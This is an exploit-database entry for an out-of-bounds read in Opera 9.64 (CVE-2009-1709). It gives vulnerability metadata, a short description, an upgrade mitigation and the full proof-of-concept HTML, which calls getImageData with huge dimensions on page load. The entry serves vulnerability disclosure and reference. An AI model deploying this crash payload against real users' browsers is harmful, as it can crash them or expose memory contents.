header-logo
Suggest Exploit
vendor:
Opera
by:
Pouya Daneshmand
8,8
CVSS
HIGH
Out-of-bounds Read
125
CWE
Product Name: Opera
Affected Version From: Opera 9.64
Affected Version To: Opera 9.64
Patch Exists: YES
Related CWE: CVE-2009-1709
CPE: a:opera_software:opera
Metasploit: https://www.rapid7.com/db/vulnerabilities/apple-safari-cve-2009-1709/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1130/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2009-1709/https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-1709/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

Opera.html

Opera.html is a malicious HTML file that contains a script which triggers an out-of-bounds read vulnerability in Opera. The vulnerability is triggered when the script calls the getImageData() function with a large width and height parameter. This causes the browser to read data outside of the allocated memory, which can lead to a crash or information disclosure.

Mitigation:

Users should upgrade to the latest version of Opera.
Source

Exploit-DB raw data:

Opera.html
<html>

<body onload="Opera()">

<script language=JavaScript>

function Opera() {

canvas = document.getElementById("canvas");

ctx = canvas.getContext("2d");

ctx.getImageData(0,0,0x20000,0x20000);

}

</script>

<canvas id=canvas width=10 height=10></canvas>

</body>

</html>




Original Advisory:

http://pouya.info/blog/userfiles/vul/OperaCC.pdf

Navigation

Suggest Exploit

Services By CQR